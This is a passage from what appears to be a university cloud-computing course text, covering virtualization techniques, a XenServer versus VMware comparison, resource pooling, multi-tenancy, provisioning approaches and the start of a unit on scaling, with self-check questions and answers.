in production situations. The open-source Xen project, for example, uses a modified
Linux kernel to virtualize the processor and memory and proprietary guest OS device
drivers to virtualize the I/O.
While the more complex binary translation support required for full virtualization is
complicated, changing the guest OS to enable paravirtualization is reasonably
straightforward. For years, VMware has deployed paravirtualization approaches in
VMware tools and optimized virtual device drivers throughout the VMware product
range. The VMware tools service gives access to the VMM Hypervisor's backdoor,
which can do tasks like time synchronization, logging, and guest termination. Vmxnet is
a hypervisor-sharing para-virtualized I/O device driver. It can take advantage of the
capabilities of the host device to increase throughput while lowering CPU usage. The
VMware tools service and the VMXnet device driver are not CPU paravirtualization
solutions, which should be noted for clarity. They are minor, non-intrusive adjustments
that do not require any changes to the guest OS kernel. VMware is assisting development
in the future. In the future, VMware will assist in creating para-virtualized Linux versions
to enable proofs of concept and product development.

Figure 8: The figure depicts the paravirtualization paradigm

3.6.3 Hardware-Assisted Virtualization:-

The other name for this virtualization is native virtualization, accelerated virtualization,
or hardware virtualization. In this type of virtualization, a special CPU instruction is
provided by real physical hardware to support virtualization. The adopted methodology is
very portable as the virtual machine manager can run an unaltered guest operating
system. This kind of methodology minimizes the implementation complexity of the
hypervisor and allows the hypervisor to manage the virtualized environment efficiently.
This sort of virtualization technique was initially launched on the IBM System / 370 in
1972, and it was made available on Intel and AMD CPUs in 2006. In this kind of
virtualization methodology, sensitive calls are by default forwarded to the hypervisor. It
is no longer necessary to use binary translation during full virtualization or hyper calls
during paravirtualization. See Figure 9 depicts the hardware-assisted virtualization
techniques.
Figure 9: The figure depicts the hardware-assisted virtualization techniques.

3.7 Network virtualization:-

Network virtualization is the process of converting a hardware-dependent network into


such a software-based network. The underlying purpose of network virtualization is to
virtualize network routing protocol, forwarding, and different addressing schemes.
Further, network virtualization will also allow every form of IT virtualization to create a
layer of abstraction between virtual hardware and the activities that use it. Network
virtualization, in particular, allows network functionalities, hardware resources, and
software resources to be offered as a virtual network, independent of hardware. It is used
to join virtual machines (VMs), partition a physical network, or merge many physical
networks. IT can improve digital service providers' overall performance, flexibility, and
reliability.

3.8 Storage virtualization:-

Storage virtualization (sometimes referred to as software-defined storage or virtual SAN)


is the process of combining different physical massive volumes of data from SANs into a
virtualized storage device. The pool may combine disparate storage gear from multiple
networks, manufacturers, or data centers into a unified logical perspective and control it
through a single window. Virtualizing storage removes the storage management software
from the underlying physical infrastructure to give more flexibility and sustainable pools
of storage resources. Furthermore, it may abstract storage hardware (arrays and discs)
into online storage pools. Figure 10 shows the storage virtualization.
Figure 10: Depicts the Storage virtualization

3.9 Desktop virtualization:-

In this type of virtualization, a software-based virtualized version of users’ workstations


is created such that the virtual environment may be accessed from any place remotely.
This type of virtualized environment may enable any user to connect themselves through
any devices having network connectivity. A very important element of digital workspace
includes desktop virtualization. In a desktop virtualization environment, mostly virtual
machines are used to run the workload. Further, it should be also noted that, in this type
of virtualization technique, all the information and data of end-users are present in the
server. Thus risk involved with respect to loss of any user data is minimum if devices are
lost. There are a number of ways through which desktop virtualization may be
implemented. However, the most acceptable ones are local and remote desktop
virtualization.

3.10 Operating system virtualizations:-

Operating system virtualization is a modified version of a standard operating system that


allows several users to access and use different applications. This entire procedure should
be completed on a single machine at a time. The virtual vision environment within
operating system virtualizations accepts commands from any client operating it and does
various tasks within the same machine while running various applications. Whenever an
operating system virtualization occurs, a program does not interfere with another even
though they run on the same computer. An operating system's kernel allows for the
existence of several segregated user-space instances. Software containers, or
virtualization engines, are what these instances are referred to as. Operating system
Virtualization is of two types (i) Linux Virtualization and (ii) Windows Virtualization.

● Linux Operating System virtualization: To virtualize Linux computers,


VMware Workstation software is utilized. Furthermore, to install any software
using virtualization, the user must first install VMware software.
● Windows Operating System Virtualizations: This sort of virtualization is
similar to the previous in that it requires the installation of VMware software
before any other software can be installed.

3.11 XenServer Vs VMware

Next, we will discuss the major difference between two very well-known hypervisors Citrix
XenServer and VMware.

VMware vSphere ESXi Hypervisor Citrix XenServer Hypervisor

VMware is generally used by small and Citrix XenServer is a virtualization platform that is
mid-sized businesses. VMware requires a utilized by individuals as well as small and medium
proprietary license and is Provided per- businesses. XenServer is Open source and also provides
processor basis. per-server licensing. However, the free version also
includes almost all the features.

Features like dynamic resource allocation is The features like dynamic resource allocation is not
supported supported

VMware has 128 Virtual CPUs (VCPUs) Citrix XenServer has 32 Virtual CPUs per Virtual
per Virtual machine. It can run on either machine. It can only run on Intel-Vt or AMD-V
Intel-Vt or AMD-V intelligent devices. intelligent systems.

Only MS-DOS and FreeBSD are supported Citrix XenServer supports various host OS such as Win
as hosts in VMware vSphere. As a guest OS, NT Server, Win XP, Linux ES, e.t.c. Citrix XenServer
VMware vSphere supports MS-DOS, Sun also supports various guest operating systems, but not
Java Desktop System, and Solaris X86 MS-DOS, Sun Java Desktop Environment, or Solaris
Platform Edition. X86 platform edition. To run, it will need AMD-V
competent hardware.

Support Failover and Live migration. Doesn’t support Failover or even Live migration.(*
Supports Dynamic Resource allocation and Newer version supports Live migration but not that
Thin Provisioning. efficiently).
Supports only Thin Provisioning.

The graphic support is not exhaustive. The graphic support is exhaustive and had better
support than VMware.

BusyBox is used by the VMware server It provides almost all the required features and ability to
management system for managing the create and manage the virtualization environment and it
environment. uses XenCenter for managing the environment.
Check your Progress 3
1) What is the difference between full virtualization and paravirtualization?
………………………………………………………………………………………………
………
………………………………………………………………………………………………
………
………………………………………………………………………………………………
………

2) Discuss briefly network and storage virtualization.


………………………………………………………………………………………………
………
………………………………………………………………………………………………
………
………………………………………………………………………………………………
………

3) State that the statement is True (T) and False (F):

a. Full virtualization is a technique to run an application or operating system


directly on a VM without any alteration and it seems to the operating system that
it is running on the real physical hardware.
[ ]

b. A binary translation and direct execution are used together to accomplish full
virtualization. [
]

c. Paravirtualization, which means "alongside virtualization," refers to


communication between the guest OS and the hypervisor to improve
performance and efficiency.[ ]

d. Native virtualization is also called as Hardware-Assisted Virtualization


[ ]

e. Network virtualization is the process of converting a software-dependent network


into such a hardware-based network.
[ ]

3.12 SUMMARY
Virtualization is the fundamental technology that helps to create an abstraction layer over the
available System hardware elements like processor, storage, and memory. Virtualization allows to
hide the intricacy of the underlying environment and provides a secure and isolated environment
for any user application. The created computing environment is virtual and it simulates an
environment similar to a real computer. The use of the virtual infrastructure is smooth as the user
finds almost no difference in the experience when compared to a real computing environment. In
this regard, a detailed overview of virtualization is given in this unit. We have discussed some
very important topics related to virtualization like advantages of virtualization, different
virtualization techniques, and its characteristics with an example. For further clarity of existing
virtualization techniques like full virtualization and paravirtualization, we have compared the two
very well-known hypervisors Citrix XenServer and VMware.

3.13 SOLUTIONS/ANSWERS
Check your Progress 1
Ans 1: Cloud Computing is a framework where different kinds of services related to networks,
computing resources, storage, development platform, and application are provisioned through the
internet. Further, Virtualization is the fundamental technology that creates an abstraction to hide
the complexity of computing infrastructure, storage, and networking. The virtualization technique
provides a secure and isolated environment for cloud users such that the computing environment
of one user does not affect the computing environment of another user.

Ans 2: In the case of virtualization more than one guest virtual machine runs on a single host
machine, and on each virtual machine different virtual applications are executed. Further, it is
very important to run each virtual machine in isolation such that no two applications running on
different virtual machines interfere with each other. In this respect, virtual machine manager
(VMM) plays an important role by managing virtual machines efficiently and providing enough
security. The operations of the different virtual machines are observed by VMM and filtered
accordingly such that no unfavorable activity is permitted. Sometimes it becomes important to
hide some sensitive or important data of the host from other guest applications running on the
same system. This kind of functionality is automatically provided by the virtualization
environment with the help of VMM.

Ans 3: In the case of emulation, the virtualization environment allows different guest applications
to run on top of the host physical machine. Here the underlying virtualized environment is a
software program and hence can be controlled more efficiently. Further, based on the requirement
of guest application or program the underlying environment can be adjusted or modified for
smooth execution.

In case of isolation, the virtualization environment enables guest virtual machines to run in
isolation such that no virtual machines running on the same host physical machine interfere with
each other. The guest virtual application accesses the underlying resources through the
abstraction layer. The virtual machine manager monitors the operation of each guest application
and tries to prevent vulnerable activity operation if any.

Check your Progress 2


Ans 1: Virtualization maximizes the availability and reliability of the service, by allowing virtual
machines to move from one host machine to another and this is called a virtual machine
migration. The migration of virtual machines is achievable as the underlying environment is
virtual. The virtual machine migration can be achieved offline or live. In case of offline migration
the guest virtual machine is temporarily stopped and after copying the image of the virtual
machine’s memory to the destination host machine virtual machine is restarted. Next in the case
of live migration an active virtual machine is moved from one host machine to another. It should
also be noted that virtualization technology prefers to migrate virtual machines from one host
machine to another when some kind of load balancing is required.

Ans 2: The advantages associated with server virtualization are as follows:


● In the case of server virtualization, each virtual machine may be restarted independently
without affecting the execution of other virtual machines running on the same host
physical machine.
● Server virtualization can partition a single physical server into many small virtual servers
and allows to utilize the hardware of the existing physical servers efficiently. Therefore
this minimizes the requirement of the extra physical servers and the initial investment
cost.
● As each small virtual server executes in isolation, if any virtual machine faces any kind of
issues then it will not affect the execution of other virtual machines running on the same
host physical machine.

The advantages associated with server virtualization are as follows:


● In the case of a host physical machine, the server faces any problem and it goes offline
then all the guest virtual machines will also get affected and will go offline. This will
decrease the overall uptime of the services or applications running on an individual
virtual machine.
● Server virtualization allows the running of many numbers of virtual machines on the
same physical server, this may reduce the performance of the overall virtualized
environment.
● Generally, server virtualization environments are not easy to set up and manage.

Ans 3: Type 1 hypervisor: This is also termed as “Bare metal” hypervisor. This type of
hypervisor runs directly on the underlying physical resources. For running this kind of hypervisor
operating system is not required and it itself acts as a host operating System. These kinds of
hypervisors are most commonly used in virtual server scenarios. The examples are Hyper-V
hypervisor, Citrix XenServer, and ESXi hypervisor.

Type 2 hypervisor: This hypervisor is not compatible with the hardware it is running on. It runs
as a program on a computer's operating system. This type of hypervisor takes the help of an
operating system to deliver virtualization-based services. Type 2 hypervisors are best suited for
endpoint devices such as personal computers that run an alternative operating system known as
Guest OS. An example is VMware Workstation.

Check your Progress 3


Ans 1: Full virtualization is a technique to run an application or operating system directly on a
VM without any alteration and it seems to the operating system that it is running on the real
physical hardware. In order to achieve this, the virtual machine manager provides an environment
that fully imitates the complete real hardware. In other words, full virtualization is a strategy for
creating a virtual machine environment that entirely imitates the physical hardware. Every
software can run on the underlying devices executed in the Virtual machine. One of the important
benefits with respect to full virtualization is that it allows the execution of the unaltered guest
operating systems in isolation. These kinds of features provide extra security and enable the
running of different unmodified operating systems in the same environment.
Paravirtualization is a virtualization approach for computing devices that enables virtual
machines (VMs) to get an interface comparable to the underlying or guest hardware. This strategy
seeks to increase the VM's performance (OS) by altering the guest operating system. The guest
OS is updated within paravirtualization. It recognizes that it is executing in a virtualized
environment on top of something like a hypervisor (the VM's hardware) rather than on actual
hardware.

Ans 2:
a. True
b. True
c. True
d. True
e. False

Ans 3: Network virtualization is the process of converting a hardware-dependent network into


such a software-based network. The underlying purpose of network virtualization is to virtualize
network routing protocol, forwarding, and different addressing schemes. Further, network
virtualization will also allow every form of IT virtualization to create a layer of abstraction
between virtual hardware and the activities that use it. Network virtualization, in particular,
allows network functionalities, hardware resources, and software resources to be offered as a
virtual network, independent of hardware. It is used to join virtual machines (VMs), partition a
physical network, or merge many physical networks. IT can improve digital service providers'
overall performance, flexibility, and reliability.

Storage virtualization (sometimes referred to as software-defined storage or virtual SAN) is the


process of combining different physical massive volumes of data from SANs into a virtualized
storage device. The pool may combine disparate storage gear from multiple networks,
manufacturers, or data centers into a unified logical perspective and control it through a single
window. Virtualizing storage removes the storage management software from the underlying
physical infrastructure to give more flexibility and sustainable pools of storage resources.
Furthermore, it may abstract storage hardware (arrays and discs) into online storage pools.

9. FURTHER READINGS
There are a host of resources available for further reading on the topic of Virtualization.
1. R. Buyya, C. Vecchiola,, and S. T. Selvi, S. T. (2013). Mastering cloud computing:
foundations and applications programming. Newnes.
2. S. A. Babu, M. J. Hareesh, J. P. Martin, S. Cherian, and Y. Sastri, "System Performance
Evaluation of Para Virtualization, Container Virtualization, and Full Virtualization Using
Xen, OpenVZ, and XenServer," 2014 Fourth International Conference on Advances in
Computing and Communications, 2014, pp. 247-250, doi: 10.1109/ICACC.2014.66.
3. https://www.ibm.com/in-en/cloud/learn/hypervisors#toc-type-1-vs--Ik2a8-2y
4. https://www.vmware.com/topics/glossary/content/hypervisor.html
5. https://www.sciencedirect.com/topics/computer-science/full-
virtualization#:~:text=Full%20virtualization%20is%20a%20virtualization,run%20in%20
each%20individual%20VM.
UNIT 4 RESOURCE POOLING, SHARING AND
PROVISIONING

4.1 Introduction
4.2 Objectives
4.3 Resource Pooling
4.4 Resource Pooling Architecture
4.4.1 Server Pool
4.4.2 Storage Pool
4.4.3 Network Pool
4.5 Resource Sharing
4.5.1 Multi Tenancy
4.5.2 Types of Tenancy
4.5.3 Tenancy at Different Level of Cloud Services
4.6 Resource Provisioning and Approaches
4.6.1 Static Approach
4.6.2 Dynamic Approach
4.6.3 Hybrid Approach
4.7 VM Sizing
4.8 Summary

4.1 INTRODUCTION

Resource pooling is the one of the essential attributes of Cloud Computing technology which
separates cloud computing approach from the traditional IT approach. Resource pooling along
with virtualization and sharing of resources, leads to dynamic behavior of the cloud. Instead of
allocating resources permanently to users, they are dynamically provisioned on a need basis.
This leads to efficient utilization of resources as load or demand changes over a period of time.
Multi-tenancy allows a single instance of an application software along with its supporting
infrastructure to be used to serve multiple customers. It is not only economical and efficient to
the providers, but may also reduce the charges for the consumers.

4.2 OBJECTIVES
After going through this unit, you should be able to:

 Know about Resources pooling –Compute, Storage and Network pools


 Know about Resources pooling architectures
 Know about Resources sharing techniques
 Describe Know about various provisioning approaches
 Describe how VM resizing is performed
 Know on the Resource Pricing

1
4.3 RESOURCE POOLING
Resource pool is a collection of resources available for allocation to users. All types of resources
– compute, network or storage, can be pooled. It creates a layer of abstraction for consumption
and presentation of resources in a consistent manner. A large pool of physical resources is
maintained in cloud data centers and presented to users as virtual services. Any resource from
this pool may be allocated to serve a single user or application, or can be even shared among
multiple users or applications. Also, instead of allocating resources permanently to users, they
are dynamically provisioned on a need basis. This leads to efficient utilization of resources as
load or demand changes over a period of time.
For creating resource pools, providers need to set up strategies for categorizing and management
of resources. The consumers have no control or knowledge of the actual locations where the
physical resources are located. Although some service providers may provide choice for
geographic location at higher abstraction level like- region, country, from where customer can
get resources. This is generally possible with large service providers who have multiple data
centers across the world.

Fig 4.1 Pooling of Physical and Virtual Resources

4.4 RESOURCE POOLING ARCHITECTURE

Each pool of resources is made by grouping multiple identical resources for example – storage
pools, network pools, server pools etc. A resource pooling architecture is then built by
2
combining these pools of resources. An automated system is needed to be established in order to
ensure efficient utilization and synchronization of pools.

Computation resources are majorly divided into three categories – Server , Storage and Network.
Sufficient quantities of physical resources of all three types are hence maintained in a data
center.

4.4.1 Server Pools

Server pools are composed of multiple physical servers along with operating system, networking
capabilities and other necessary software installed on it. Virtual machines are then configured
over these servers and then combined to create virtual server pools. Customers can choose virtual
machine configurations from the available templates (provided by cloud service provider) during
provisioning. Also, dedicated processor and memory pools are created from processors and
memory devices and maintained separately. These processor and memory components from their
respective pools can then be linked to virtual servers when demand for increased capacity arises.
They can further be returned to the pool of free resources when load on virtual servers decreases.

4.4.2 Storage Pools

Storage resources are one of the essential components needed for improving performance, data
management and protection. It is frequently accessed by users or applications as well as needed
to meet growing requirements, maintaining backups, migrating data, etc.

Storage pools are composed of file based, block based or object based storage made up of
storage devices like- disk or tapes and available to users in virtualized mode.

1. File based storage – it is needed for applications that require file system or shared file access.
It can be used to maintain repositories, development, user home directories, etc.

2. Block based storage – it is a low latency storage needed for applications requiring frequent
access like databases. It uses block level access hence needs to be partitioned and formatted
before use.

3. Object based storage – it is needed for applications that require scalability, unstructured data
and metadata support. It can be used for storing large amounts of data for analytics, archiving or
backups.

4.4.3 Network Pools

3
Resources in pools can be connected to each other, or to resources from other pools, by network
facility. They can further be used for load balancing, link aggregation, etc.

Network pools are composed of different networking devices like- gateways, switches, routers,
etc. Virtual networks are then created from these physical networking devices and offered to
customers. Customers can further build their own networks using these virtual networks.

Generally, dedicated pools of resources of different types are maintained by data centers. They
may also be created specific to applications or consumers. With the increasing number of
resources and pools, it becomes very complex to manage and organize pools. Hierarchical
structure can be used to form parent-child, sibling, or nested pools to facilitate diverse resource
pooling requirements.

Check Your Progress 1

1. What is a Resource pool ?


2. Explain Respource pooling architecture.
3. What are the various types of storage pools available. Explain.

4.5 RESOURCE SHARING

Cloud computing technology makes use of resource sharing in order to increase resource
utilization. At a time, a huge number of applications can be running over a pool. But they may
not attain peak demands at the same time. Hence, sharing them among applications can increase
average utilization of these resources.

Although resource sharing offers multiple benefits like – increasing utilization, reduces cost and
expenditure, but also introduces challenges like – assuring quality of service (QoS) and
performance. Different applications competing for the same set of resources may affect run time
behavior of applications. Also, the performance parameters like- response and turnaround time
are difficult to predict. Hence, sharing of resources requires proper management strategies in
order to maintain performance standards.

4.5.1 Multi-tenancy

4
Multi-tenancy is one of the important characteristics found in public clouds. Unlike traditional
single tenancy architecture which allocates dedicated resources to users, multi-tenancy is an
architecture in which a single resource is used by multiple tenants (customers) who are isolated
from each other. Tenants in this architecture are logically separated but physically connected. In
other words, a single instance of a software can run on a single server but can server multiple
tenants. Here, data of each tenant is kept separately and securely from each other. Fig 1 shows
single tenancy and multi-tenancy scenarios.

Multi-tenancy leads to sharing of resources by multiple users without the user being aware of it.
It is not only economical and efficient to the providers, but may also reduce the charges for the
consumers. Multi-tenancy is a feature enabled by various other features like- virtualization,
resource sharing, dynamic allocation from resource pools.

In this model, physical resources cannot be pre-occupied by a particular user. Neither the
resources are allocated to an application dedicatedly. They can be utilized on a temporary basis
by multiple users or applications as and when needed. The resources are released and returned to
a pool of free resources when demand is fulfilled which can further be used to serve other
requirements. This increases the utilization and decreases investment.

Fig 1: Single tenancy Vs Multi-tenancy

4.5.2 Types of Tenancy

There are two types of tenancy – Single tenancy and multi-tenancy.

5
In single tenancy architecture, a single instance of an application software along with its
supporting infrastructure, is used to serve a single customer. Customers have their own
independent instances and databases which are dedicated to them. Since there is no sharing with
this type of tenancy, it provides better security but costs more to the customers.

In multi-tenancy architecture, a single instance of an application software along with its


supporting infrastructure, can be used to serve multiple customers. Customers share a single
instance and database. Customer’s data is isolated from each other and remains invisible to
others. Since users are sharing the resources, it costs less to them as well as is efficient for the
providers.

Multi-tenancy can be implemented in three ways –

1. Single multi-tenant database - It is the simplest form where a single application instance
and a database instance is used to host the tenants. It is a highly scalable architecture where more
tenants can be added to the. It also reduces cost due to sharing of resources but increases
operational complexity.

2. One database per tenant – It is another form where a single application instance and
separate database instances are used for each tenant. Its scalability is low and costs higher as
compared to a single multi-tenant database due to overhead included by adding each database.
Due to separate database instances, its operational complexity is less.

3. One app instance and one database per tenant - It is the architecture where the whole
application is installed separately for each tenant. Each tenant has its own separate app and
database instance. This allows a high degree of data isolation but increases the cost.

4.5.3 Tenancy at Different Level of Cloud Services

Multi-tenancy can be applied not only in public clouds but also in private or community
deployment models. Also, it can be applied to all three service models – Infrastructure as a
Service (IaaS), Platform as a Service (PaaS) and Software as a Service (SaaS). Multi-tenancy
when performed at infrastructure level, makes other levels also multi-tenant to certain extent.

Multi-tenancy at IaaS level can be done by virtualization of resources and customers sharing the
same set of resources virtually without affecting others. In this, customers can share
infrastructure resources like- servers, storage and network.

6
Multi-tenancy at PaaS level can be done by running multiple applications from different vendors
over the same operating system. This removes the need for separate virtual machine allocation
and leads to customers sharing operating systems. It increases utilization and ease maintenance.

Multi-tenancy at SaaS level can be done by sharing a single application instance along with a
database instance. Hence a single application serves multiple customers. Customers may be
allowed to customize some of the functionalities like- change view of interface but they are not
allowed to edit applications since it is serving other customers also.

Check Your Progress 2

1. What is a Single tenancy and Multi-tenancy?


2. Explain teanancy at different service levels of cloud.

4.6 RESOURCE PROVISIONING AND


APPROACHES

Resource provisioning is the process of allocating resources to applications or the customers.


When a customer demands resources, they must be provisioned automatically from a shared pool
of configurable resources. Virtualization technology makes the allocation of resources faster. It
allows creation of virtual machines in minutes, where customers can choose configurations of
their own. Proper management of resources is needed for rapid provisioning.

Resource provisioning is required to be done efficiently. Physical resources are not allocated to
users directly. Instead, they are made available to virtual machines, which in turn are allocated to
users and applications. Resources can be assigned to virtual machines using various
provisioning approaches. There can be three types of resources provisioning approaches– static,
dynamic and hybrid.

4.6.1 Static Approach

In static resource provisioning, resources are allocated to virtual machines only once, at the
beginning according to user’s or application’s requirement. It is not expected to change further.
Hence, it is suitable for applications that have predictable and static workloads. Once a virtual
machine is created, it is expected to run without any further allocations.

7
Although there is no runtime overhead associated with this type of provisioning, it has several
limitations. For any application, it may be very difficult to predict future workloads. It may lead
to over-provisioning or under-provisioning of resources. Under-provisioning is the scenario
when actual demand for resources exceeds the available resources. It may lead to service
downtime or application degradation. This problem may be avoided by reserving sufficient
resources in the beginning. But reserving large amounts of resources may lead to another
problem called Over-provisioning. It is a scenario in which the majority of the resources remain
un-utilized. It may lead to inefficiency to the service provided and incurs unnecessary cost to the
consumers. Fig 2 shows the under-provisioning and Fig 3 shows over-provisioning scenarios.

Fig 2: Problem of Resource Under-provisioning

Fig 3: Problem of Resource Over-provisioning

4.6.2 Dynamic Approach

8
In dynamic provisioning, as per the requirement, resources can be allocated or de-allocated
during run-time. Customers in this case don’t need to predict resource requirements. Resources
are allocated from the pool when required and removed from the virtual machine and returned
back to the pool of free resources when no more are required. This makes the system elastic.
This approach allows customers to be charged per usage basis.

Dynamic provisioning is suited for applications where demands for resources are un-predictable
or frequently varies during run-time. It is best suited for scalable applications. It can adapt to
changing needs at the cost of overheads associated with run-time allocations. This may lead to a
small amount of delay but solves the problem of over-provisioning and under-provisioning.

4.6.3 Hybrid Approach

Dynamic provisioning although solves the problems associated with static approach but may lead
to overheads at run-time. Hybrid approach solves the problem by combining the capabilities of
static and dynamic provisioning. Static provisioning can be done in the beginning when creating
a virtual machine in order to limit the complexity of provisioning. Dynamic provisioning can be
done later for re-provisioning when the workload changes during run-time. This approach can be
efficient for real-time applications.

4.7 VM SIZING

Virtual machine (VM) sizing is the process of estimating the amount of resources that a VM
should be allocated. Its objective is to make sure that VM capacity is kept proportionate to the
workload. This estimation is based upon various parameters specified by the customer. VM
sizing is done at the beginning in case of static provisioning. In dynamic provisioning, VM size
can be changed depending upon the application workload.

There are two ways to do VM sizing –

1. Individual VM based – In this case, depending upon the previous workload patterns,
resources are allocated VM-by-VM initially. Resources can be later allocated from the pool
when load reaches beyond expectations.
2. Joint-VM based – In this case, allocation to VMs are done in a combined way. Resources
assigned to a VM initially can be reassigned to another VM hosted on the same physical
machine. Hence it leads to overall efficient utilization.

9
Check Your Progress 3

1. What is a Resource Provisioning ?


2. Explain various resource provisioning approaches.
3. Explain the problems of Over-provisioning and Under-provisioning.

4.8 SUMMARY
In this unit an important attribute of Cloud Computing technology called Resource pooling is
discussed. It is a collection of resources available for allocation to users. A large pool of physical
resources - storage, network and server pools are maintained in cloud data centers and presented
to users as virtual services. Resources may be allocated to serve a single user or application, or
can be even shared among multiple users or applications. Resources can be assigned to virtual
machines using static, dynamic and hybrid provisioning approaches.

Answers to Check Your Progress 1

1. Resource pool is a collection of resources available for allocation to users. All types of
resources – compute, network or storage, can be pooled. It creates a layer of abstraction for
consumption and presentation of resources in a consistent manner. A large pool of physical
resources is maintained in cloud data centers and presented to users as virtual services. Any
resource from this pool may be allocated to serve a single user or application, or can be even
shared among multiple users or applications. Also, instead of allocating resources permanently to
users, they are dynamically provisioned on a need basis. This leads to efficient utilization of
resources as load or demand changes over a period of time.

2. A resource pooling architecture is composed of Server, storage and network pools. An


automated system is needed to be established in order to ensure efficient utilization and
synchronization of pools.

a) Server pools - They are composed of multiple physical servers along with operating
system, networking capabilities and other necessary software installed on it.
b) Storage pools – They are composed of file based, block based or object based storage
made up of storage devices like- disk or tapes and available to users in virtualized mode.
c) Network pools - They are composed of different networking devices like- gateways,
switches, routers, etc. Virtual networks are then created from these physical networking

10
devices and offered to customers. Customers can further build their own networks using
these virtual networks.

3. Storage pools are composed of file based, block based or object based storage.

a) File based storage – it is needed for applications that require file system or shared file
access. It can be used to maintain repositories, development, user home directories, etc.
b) Block based storage – it is a low latency storage needed for applications requiring
frequent access like databases. It uses block level access hence needs to be partitioned
and formatted before use.
c) Object based storage – it is needed for applications that require scalability,
unstructured data and metadata support. It can be used for storing large amounts of data
for analytics, archiving or backups.

Answers to Check Your Progress 2

1. In single tenancy architecture, a single instance of an application software along with its
supporting infrastructure, is used to serve a single customer. Customers have their own
independent instances and databases which are dedicated to them. Since there is no sharing with
this type of tenancy, it provides better security but costs more to the customers.
In multi-tenancy architecture, a single instance of an application software along with its
supporting infrastructure, can be used to serve multiple customers. Customers share a single
instance and database. Customer’s data is isolated from each other and remains invisible to
others. Since users are sharing the resources, it costs less to them as well as is efficient for the
providers.

2. Multi-tenancy can be implemented at all the service levels.

a) Multi-tenancy at IaaS level – It can be done by virtualization of resources and


customers sharing the same set of resources virtually without affecting others. In this
way, customers can share infrastructure resources.

b) Multi-tenancy at PaaS level- It can be done by running multiple applications from


different vendors over the same operating system. This removes the need for separate
virtual machine allocation and leads to customers sharing operating systems.

c) Multi-tenancy at SaaS level- It can be done by sharing a single application instance


along with a database instance. Hence a single application serves multiple customers.

11
Answers to Check Your Progress 3

1. Resource provisioning is the process of allocating resources to applications or the customers.


When a customer demands resources, they must be provisioned automatically from a shared
pool of configurable resources.

2. There can be three types of resources provisioning approaches– static, dynamic and hybrid.

a) In static resource provisioning, resources are allocated to virtual machines only


once, at the beginning according to user’s or application’s requirement. It is not
expected to change further. It is suitable for applications that have predictable and
static workloads.

b) In dynamic provisioning, as per the requirement, resources can be allocated or de-


allocated during run-time. Customers in this case don’t need to predict resource
requirements. It is suited for applications where demands for resources are un-
predictable or frequently varies during run-time.

c) Hybrid Provisioning combines the capabilities of static and dynamic provisioning.


Static provisioning is done in the beginning when creating virtual machines in
order to limit the complexity of provisioning. Dynamic provisioning is done later
for re-provisioning when the workload changes during run-time. This approach
can be efficient for real-time applications.

3. Under-provisioning is the scenario when actual demand for resources exceeds the available
resources. It may lead to service downtime or application degradation. This problem may be
avoided by reserving sufficient resources in the beginning.

Reserving large amounts of resources may lead to another problem called Over-provisioning. It
is a scenario in which the majority of the resources remain un-utilized. It may lead to
inefficiency to the service provided and incurs unnecessary cost to the consumers.

12
RESOURCE PROVISIONING,
LOAD BALANCING AND
SECURITY

UNIT 5 SCALING

Structure:-

5.1 Introduction
5.2 Objective
5.3 Scaling primitives
5.4 Scaling Strategies
5.4.1 Proactive Scaling
5.4.2 Reactive Scaling
5.4.3 Combinational Scaling
5.5 Auto Scaling in Cloud
5.6 Types of Scaling
5.6.1 Vertical Scaling or Scaling Up
5.6.2 Horizontal Scaling or Scaling Out

5.1 INTRODUCTION

The scalability in cloud computing refers to the flexibility of allocating IT


resources as per the demand. Various applications running on cloud instances
experience variable traffic loads and hence the need of scaling arises. The need
of such applications can be of different types such as CPU allocation, Memory
expansion, storage and networking requirements etc. To address these different
requirements, virtual machines are one of the best ways to achieve scaling.
Each of the virtual machines is equipped with a minimum set of configurations
for CPU, Memory and storage. As and when required, the machines can be
configured to meet the traffic load. This is achieved by reconfiguring the
virtual machine for better performance for the target load. Sometimes it is quite
difficult to manage such ondemand configurations by the persons, hence auto
scaling techniques plays a good role.

In this unit we will focus on the various methods and algorithms used in the
process of scaling. We will discuss various types of scaling, their usage and a
few examples. We will also discuss the importance of various techniques in
saving cost and man efforts by using the concepts of cloud scaling in highly
dynamic situations. The suitability of scaling techniques in different scenarios
is also discussed in detail.

For scaling, to understand elastic property of Cloud is important. I would


recommend to brief about the Cloud Elasticity here?

5.2 OBJECTIVES

1
SCALING
After going through this unit you should be able to:
➔ describe scaling and its advantage;

➔ understand the different scaling techniques;


➔ learn about the scaling up and down approaches;

➔ understand the basics of auto scaling


➔ compare among Proactive and Reactive scaling;

5.3 SCALING PRIMITIVES

The basic purpose of scaling is to enable one to use cloud computing


infrastructure as much as required by the application. Here, the cloud resources
are added or removed according to the current need of the applications. The
property to enhance or to reduce the resources in the cloud is referred to as
cloud elasticity, the process is known as scaling. Scaling exploits the elastic
property of the Cloud. The scalability of cloud architecture is achieved using
virtualization (see Unit 3: Resource Virtualization). Virtualization uses virtual
machines (VM’s) for enhancing (up scaling) and reducing (down scaling)
computing power. The scaling provides opportunities to grow businesses to a
more secure, available and need based computing/ storage facility on the cloud.
Scaling also helps in optimizing the financial involved for highly resource
bound applications for small to medium enterprises.
Better to include one picture to explain cloud elasticity?
The key advantages of cloud scaling are: -

1. Minimum cost: The user has to pay a minimum cost for access usage of
hardware after upscaling. The hardware cost for the same scale can be
much greater than the cost paid by the user. Also, the maintenance and
other overheads are also not included here. Further, as and when the
resources are not required, they may be returned to the Service provider
resulting in the cost saving.

2. Ease of use: The cloud upscaling and downscaling can be done in just a
few minutes (sometime dynamically) by using service providers
application interface.

3. Flexibility: The users have the flexibility to enable/ disable certain


VM’s for upscaling and downscaling by them self and thus saving
configuration/ installation time for new hardware if purchased
separately.

4. Recovery: The cloud environment itself reduces the chance of disaster


and amplifies the recovery of information stored in the cloud.

2
RESOURCE PROVISIONING,
LOAD BALANCING AND
SECURITY

The scalability of the clouds aims to optimize the utilization of various


resources under varying workload conditions such as under provisioning and
over provisioning of resources. In non-cloud environments resource utilization
can be seen as a major concern as one has no control on scaling. Various
methods exist in literature which may be used in traditional environment
scaling. In general, a peak is forecasted and accordingly infrastructure is set up
in advance. This scaling experience high latency and require manual
monitoring. The associated drawbacks of this type of setup is quite crucial in
nature as estimation of maximum load may exist at both ends making either
high end or poorly configured systems.

In the case of the clouds, virtual environments are utilized for resource
allocation. These virtual machines enable clouds to be elastic in nature which
can be configured according to the workload of the applications in real time. In

costs

Workload

Checkpoint|

Time

Figure 1. Manual scaling in traditional environments

costs

Workload
Checkpoint|

Time

